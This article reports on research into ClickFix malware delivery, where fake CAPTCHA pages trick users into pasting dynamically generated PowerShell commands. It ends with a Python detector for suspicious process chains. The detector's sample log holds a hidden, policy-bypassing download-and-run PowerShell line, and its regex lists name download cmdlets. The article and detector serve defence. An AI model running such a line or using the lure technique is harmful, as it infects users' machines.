Security researcher Bert-Jan Pals has dissected a ClickFix malware distribution method in which the commands handed to victims are generated on demand by API-driven backend servers. His findings, presented at OrangeCon in early June and written up on June 30, describe a system that gives each visitor a uniquely disguised wrapper around the same payload, so that defences keyed on a fixed command string or file hash do not match.
Understanding ClickFix: A Simple Yet Effective Threat
ClickFix relies on a simple but effective tactic: it tricks users into running the malware themselves. A page shows a fake CAPTCHA or error message, JavaScript on that page silently copies a command (typically a PowerShell or cmd one-liner) to the clipboard, and the prompt instructs the user to paste it into the Run box or a terminal and press Enter. Because the victim launches the command from a legitimate shell, there is no exploit or browser download for conventional antivirus to block, and case numbers have risen sharply. ESET reported a 517% increase in occurrences from late 2024 into 2025, and Microsoft's 2025 Digital Defense Report names ClickFix as a major initial-access vector.
API-Driven Payloads: A New Era of Malware Delivery
The research shows that the clipboard commands are generated dynamically by backend servers that behave like an on-demand service. Each request receives a unique command, wrapped in different encryption layers, that ultimately runs the same script through PowerShell. The disguise changes on every request while the core payload stays constant, and the server adapts the returned command to the visitor's operating system and language.
Pals' analysis shows that this 'as-a-service' model is not just a naming convention. It is a commercialised system in which attackers buy ClickFix builders, which widens the threat's reach and adds to its complexity. The payload generation process is still evolving, and Pals expects that it could soon vary the malware itself per target rather than only its wrapper.
Emerging Techniques and Global Implications
A newer variant has the pasted command first download a file to the user's system and then launch it, so the clipboard one-liner itself looks innocuous. Keeping the malicious logic in a separate file rather than in the pasted command is intended to get past AMSI, Microsoft's Antimalware Scan Interface, which hands script content to the installed antivirus for inspection at execution time. Instructing victims to paste into Windows Terminal instead of the Run box has further complicated detection, since the resulting process chain differs from the explorer.exe-to-PowerShell pattern many detections expect.
ClickFix is no longer solely a criminal tool. State-sponsored groups from Russia, Iran, and North Korea have integrated it into their operations, and variants such as FileFix and DownloadFix have emerged. Security firm Expel identified a significant ClearFake campaign that may have affected more than 147,000 systems since August 2025.
Defensive Measures and Future Outlook
For defenders, the focus should stay on process chains rather than clipboard content. Parent processes such as explorer.exe (which hosts the Run box) or WindowsTerminal.exe spawning powershell.exe or cmd.exe should be scrutinised. Behavioural EDR, application control, and user education remain vital, and one-liners that write to or execute from the Downloads folder deserve particular attention.
Pals stresses that ClickFix is an enduring threat that keeps evolving as defenders adapt. Its dynamic payload servers keep the lure ahead of static signatures, so the security community should watch for changes in the malware itself, not only in its current wrappers.
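The process-chain rule above can be expressed as a small detection over process-creation telemetry. The following is an added example, not code from the article or from Pals' research: it parses constructed Sysmon-style Event ID 1 records (the pipe-delimited `key=value` layout, the field names and all paths and command lines are assumptions made up for this illustration), flags any powershell/pwsh/cmd/mshta child of explorer.exe or WindowsTerminal.exe, and raises the severity when the command line shows download cmdlets, a Downloads-folder path, an encoded command, a hidden window or an execution-policy bypass.

```python
"""Flag ClickFix-style process chains in constructed process-creation records.

Added example, not from the original article. Log format, field names, paths
and command lines below are assumptions constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Parents a pasted ClickFix command is launched from: the Run box is hosted by
# explorer.exe, and the newer lures direct victims to Windows Terminal.
LURE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
# Interpreters the pasted one-liner typically runs in.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line indicators (case-insensitive). Dict order fixes report order.
INDICATORS = {
    "download_cmdlet": re.compile(
        r"\b(invoke-webrequest|iwr|curl|wget|downloadstring|downloadfile|start-bitstransfer)\b", re.I),
    "downloads_folder": re.compile(r"\\Downloads\\", re.I),
    "encoded_command": re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s*hidden", re.I),
    "exec_bypass": re.compile(r"-(ep|executionpolicy)\s*bypass", re.I),
}

# Constructed sample telemetry (Sysmon Event ID 1 fields, flattened to key=value).
SAMPLE_LOG = r"""
EventID=1|ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -w hidden -ep bypass -c "iwr https://example.invalid/s.ps1 -OutFile $env:USERPROFILE\Downloads\s.ps1; & $env:USERPROFILE\Downloads\s.ps1"
EventID=1|ParentImage=C:\Program Files\WindowsApps\WindowsTerminal\WindowsTerminal.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd /c start C:\Users\u\Downloads\report.hta
EventID=1|ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe C:\Users\u\notes.txt
EventID=1|ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -File C:\scripts\backup.ps1
EventID=1|ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell
"""


@dataclass
class Finding:
    parent: str
    child: str
    indicators: list[str]
    command_line: str

    @property
    def severity(self) -> str:
        # A download or Downloads-folder reference from a lure parent is the
        # FileFix/DownloadFix shape; any other indicator is medium; the bare
        # explorer-to-shell chain is still worth a low-severity look.
        if "download_cmdlet" in self.indicators or "downloads_folder" in self.indicators:
            return "high"
        return "medium" if self.indicators else "low"


def parse_record(line: str) -> dict[str, str]:
    """Split one pipe-delimited key=value record into a dict (first '=' wins)."""
    fields: dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(record: dict[str, str]) -> Finding | None:
    """Return a Finding for a lure-parent -> shell-child chain, else None."""
    if record.get("EventID") != "1":
        return None
    parent = basename(record.get("ParentImage", ""))
    child = basename(record.get("Image", ""))
    if parent not in LURE_PARENTS or child not in SHELL_CHILDREN:
        return None
    cmd = record.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return Finding(parent, child, hits, cmd)


def scan(log_text: str) -> list[Finding]:
    """Evaluate every non-empty record and keep the suspicious chains."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        finding = evaluate(parse_record(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity:6}] {f.parent} -> {f.child}  {f.indicators}")
```

The chain alone (explorer.exe launching a bare `powershell`) is reported at low severity rather than dropped, because the point of the process-chain approach is that the parent is the stable signal while the command text changes per request. Real deployments would read Sysmon or EDR events directly and tune the parent list to the lures seen in their own telemetry.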
